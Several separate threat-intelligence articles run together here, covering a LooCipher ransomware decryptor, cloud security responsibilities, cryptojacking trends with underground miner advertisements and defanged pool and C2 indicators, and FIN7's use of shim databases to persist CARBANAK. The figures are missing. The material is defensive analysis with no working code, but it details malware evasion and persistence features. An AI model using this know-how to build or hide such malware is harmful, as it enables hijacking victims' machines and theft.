Most of the LooCipher technical features are described as follows:

  • The ransomware spreads using weaponized Word document.
  • The Command and Control is hosted on the TOR Network, at the following onion address “hxxp://hcwyo5rfapkytajg[.]onion” .
  • The attackers leverage several Tor2Web proxy services to easily allow the access to the Tor C2.
  • The binary can work both as cryptor and decryptor.
  • The C2 dynamically generates a different Bitcoin address for each infection.

The Fortinet researches spent time in describing the used algorithm (AES-256-ECB) and portrayed a decryption code as showed in the following image. By focusing on how to recover the obfuscated key – which was retrievable either via network or via memory dumping Fortinet researchers gave us the right reading key to be able to write our own decryptor code.

From Fortinet Report

The turning point was on the way the key was encoded. The obfuscation method was quite trivial. It consists in a simple find-and-replace of each key characters with a pre-defined double-digit number, belonging to the following set:

Decoding Matrix

So once retrieved the obfuscated key it was possible to reconstruct the original key to decrypt all involved files.

The master key is available directly in memory into LooCipher segments. So please remember to not kill the process even if you have been infected or to not reboot your windows box. If you kill the process or reboot your system, ZLab Team decrypter is not going to work there. You can download it HERE and use it for free.

  1. Find the Process ID of the LooCipher ransomware
  2. Open cmd with the Administrator privileges in the path where is downloaded the tool

Happy recovery !

e-Crime & Cybersecurity Congress: Cloud Security Fundamentals

I was a panellist at the e-Crime & Cybersecurity Congress last week, the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond", a recap of the points I made.
Cloud is the 'Default Model' for Business
Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes successful business continually craves. Indeed, the 'scales of economy' benefits are not just most cost-effective and more agile IT services, but also include better cybersecurity (by the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business' cloud service mitigation, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given they ultimately own the cybersecurity risk, which is an operational business risk.

There are security pitfalls with cloud services, the marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure, as after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.

Cloud Security should not be an afterthought

It is essential for security to be baked into a new cloud services design, requirements determination, and in the procurement process. In particular, defining and documenting the areas of security responsibility with the intended cloud service provider.

Cloud does not absolve the business of their security responsibilities

All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
  • Cloud Service Provider Owned
  • Business Owned
  • Shared (Cloud Service Provider & Business)
For example with a PaaS model, the business is fully responsible for application deployment onto the cloud platform, and therefore the security of applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. The example of the 'shared' responsibility with this model, are the processes in providing and managing privileged operating system accounts within the cloud environment.

Regardless of the cloud model, data is always the responsibility of the business.

A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where those security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within a contract or in a supporting agreement as service deliverables, then oversight the controls and processes through regular assessments.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners


Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.

Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.

Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities











Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option

Figure 3: Monero Madness

Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram

Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel

Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)

Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking


FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.

Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools and

Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames













Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).

Figure 10: Cryptocurrency miner detection activity per month

Figure 11: Commonly observed pools and associated ports

Figure 12: Top 10 affected countries

Figure 13: Top five affected industries

Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.

Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.


In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Services Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim

FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077” was interesting because this KB number was not a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

